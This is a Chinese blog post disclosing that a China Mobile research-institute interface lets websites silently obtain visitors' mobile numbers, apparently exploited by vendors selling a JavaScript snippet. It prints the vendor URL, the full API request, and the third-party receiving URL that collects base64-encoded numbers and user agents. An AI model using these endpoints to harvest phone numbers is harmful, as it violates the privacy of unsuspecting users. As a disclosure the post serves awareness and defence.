中国移动某接口泄漏可导致访问网站就获取用户手机号(已经发现网站利用案例)

有商家在出售获取手机号:http://112.124.4.229:808/member/my.php?mid=21&status=4

手机网站加载一段他们提供的js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!

通过抓包分析可以发现:

注:抓包要用谷歌浏览器伪装成手机访问,不然抓包不到,它们屏蔽了pc!

当用户访问手机网站后,会加载一段js,js请求访问移动研究院的IP:http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D

获取到手机号之后,会把手机号通过base64加密返回给 js请求的参数q的值,如上面的:

http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz

参数corp 的值就是手机信息base64位加密后的,解密后可以发现内容为:

null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53

如果是手机访问网站的话, null 就会是你的手机号,我电脑访问的,所以没手机号

  • 4
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值